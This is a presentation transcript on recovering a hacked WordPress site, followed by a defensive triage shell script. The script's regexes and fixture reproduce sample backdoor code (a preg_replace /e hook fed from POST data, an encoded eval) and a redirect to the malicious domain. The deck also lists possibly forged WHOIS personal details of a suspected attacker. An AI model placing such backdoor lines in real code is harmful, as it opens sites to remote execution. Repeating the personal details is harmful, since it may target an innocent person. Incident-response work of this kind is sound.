
Securing hacked website // Malware infected website filled with backdoors

This is a short presentation on how we encountered a hacked website, the countermeasures we took to recover the site from the malware, and how we then applied Wordfence and Cloudflare protection.

Published in: Internet

  1. Securing hacked website: last week's incident
  2. What happened?
     Richard, a grad student, notified us of an issue with a website (http://www.bnaijacobjc.com/), and the next day he received credentials from the site's owner so that we could help fix it. Anyone reaching the site from a Google search or from a backlink was redirected by a malicious script injected into the site to drive-by download pages, video sites, advertisements, etc. After numerous countermeasures we finally fixed it.
  3. Multiple issues
     ● Theme with malicious JS that redirects users to advertising (http://portal-b.pw/XcTyTp)
       ^ NSFW: redirects to drive-by downloads, advertisements, porn
     ● Old WordPress version
     ● Multiple backdoors found, which an attacker could use to regain access
     ● Exploited RCE vulnerability in PHP's preg_replace function (the /e modifier, which evaluates the replacement string as PHP code)
  4. Fixes / countermeasures
     ● Identified and ordered recently changed files, and removed the malicious ones
       Listing files modified in the last 3 days:
       $ find . -mtime -3
     ● Updated WordPress and installed security scanner plugins: Acunetix Secure WordPress, Wordfence Security
     ● Analyzed the traffic pattern through Chrome Developer Tools; throttled network traffic to step through the multiple redirects
     ● Identified a backdoor in one of the themes and removed it:
       $ grep -nri "_wp_http_referer" .
       $ grep -nri "portal-b.pw" .
  5. Infrastructure / access level used for the fixes
     ● GoDaddy hosting with cPanel
     ● phpMyAdmin (DB access) to reset the wp-admin credentials
     ● SSH access to execute CLI commands (Linux)
  6. Some findings about the attacker // appears to be using a pseudonym
     ● The portal-b.pw domain is used to circulate advertisements of all kinds.
     ● WHOIS on the domain revealed someone in RU (the information could be forged):
       ID: C97505165-CNIC
       Name: Dzhamaldin Budunov
       Organization: Private Person
       Street: molodezhnaya 16/2
       City: s. Sokur
       State/Province: Saratovskaya oblast
       Postal Code: 421994
       Country: RU
       Phone: +7.9192930122
       Email: ovodnevay@rambler.ru
  7. Questions?!
     By Mayur Pipaliya (mpipaliya) at Cyber Security Center, SPU / Nov'16
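The triage in slides 3 and 4 (list recently modified files, then grep the tree for the redirect domain, the backdoor marker and the preg_replace RCE) can be scripted. The following POSIX shell script is an added example, not the deck's own script: it wraps the deck's `find -mtime` and `grep -nri` commands, adds a heuristic for the preg_replace /e backdoor and for the other common dropped backdoor (eval of an encoded payload), and builds a constructed sample tree to run against. The file names in make_fixture, the exact regexes, and the choice to scan only wp-content are assumptions; the indicator strings (portal-b.pw, _wp_http_referer) are the deck's.

```shell
#!/bin/sh
# wp_triage.sh: first-pass triage of a compromised WordPress tree.
# Added example, not the deck's script. Automates the deck's manual steps
# (`find . -mtime -3`, `grep -nri` for the indicators) and adds two generic
# PHP backdoor signatures. File names in make_fixture and the indicator
# regexes are assumptions, not artefacts from the incident.

# Regular files modified in the last DAYS days (default 3).
# -type f drops the directories that a bare `find . -mtime -3` also lists.
recent_files() {
    find "$1" -type f -mtime "-${2:-3}" | sort
}

# Heuristic for the preg_replace /e backdoor: a preg_replace() whose first
# (pattern) argument ends in modifiers containing 'e'. /e made PHP eval the
# replacement string, so passing request data as the replacement was RCE
# (deprecated in PHP 5.5, removed in 7.0). Only '/' delimiters are handled.
PREG_E_PATTERN="preg_replace[[:space:]]*\([[:space:]]*[\"'][^\"']*/[a-zA-Z]*e[\"']"

# Indicator hunt: the deck's two strings plus eval-of-encoded-payload.
# Run it on wp-content only: WordPress core emits _wp_http_referer in every
# nonce form, so hits in wp-includes/wp-admin are expected, not evidence.
scan_indicators() {
    grep -rniE \
        -e 'portal-b\.pw' \
        -e '_wp_http_referer' \
        -e "$PREG_E_PATTERN" \
        -e 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)' \
        "$1" 2>/dev/null
}

triage() {
    dir=$1; days=${2:-3}
    echo "== regular files modified in the last $days days under $dir =="
    recent_files "$dir" "$days"
    echo "== indicator hits under $dir/wp-content (core directories skipped) =="
    scan_indicators "$dir/wp-content" || echo "(none)"
}

# Constructed sample tree (hypothetical, not the incident's files): one clean
# core file plus three infected files of the kinds the deck describes.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes" "$d/wp-content/themes/twentysixteen" "$d/wp-content/uploads"
    # legitimate core code: a nonce form field, so the identifier alone is not an indicator
    printf '%s\n' '<?php' "echo '<input type=hidden name=_wp_http_referer />';" \
        > "$d/wp-includes/functions.php"
    # injected redirect to the ad/malware domain
    printf '%s\n' '<script src="http://portal-b.pw/XcTyTp"></script>' \
        > "$d/wp-content/themes/twentysixteen/footer.php"
    # preg_replace /e backdoor fed from a POST field named like a core parameter
    printf '%s\n' '<?php' '@preg_replace("/.*/e", $_POST["_wp_http_referer"], "");' \
        > "$d/wp-content/themes/twentysixteen/header.php"
    # encoded-eval dropper in uploads ("ZWNobyAxOw==" is just 'echo 1;')
    printf '%s\n' '<?php eval(base64_decode("ZWNobyAxOw=="));' \
        > "$d/wp-content/uploads/cache.php"
    # age the core file (Nov 2016) so only attacker-touched files are "recent"
    touch -t 201611010000 "$d/wp-includes/functions.php"
    echo "$d"
}

case "${1:-}" in
    --demo) d=$(make_fixture); triage "$d"; rm -rf "$d" ;;
    "")     ;;                          # no args: define functions only
    *)      triage "$1" "${2:-3}" ;;   # wp_triage.sh /var/www/html [days]
esac
```

Run `sh wp_triage.sh --demo` to see the three infected files listed by both passes while the aged core file is silent. Two caveats the deck's one-liners hide: the mtime pass is only as good as the attacker's laziness, since a dropped file's timestamp can be reset with `touch`, so it should be backed by a checksum comparison against a clean copy of the same WordPress release and theme; and every grep hit needs a look at the surrounding code before deletion, because the deck's `_wp_http_referer` string matches legitimate core and plugin code as well as the backdoor that abused it.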
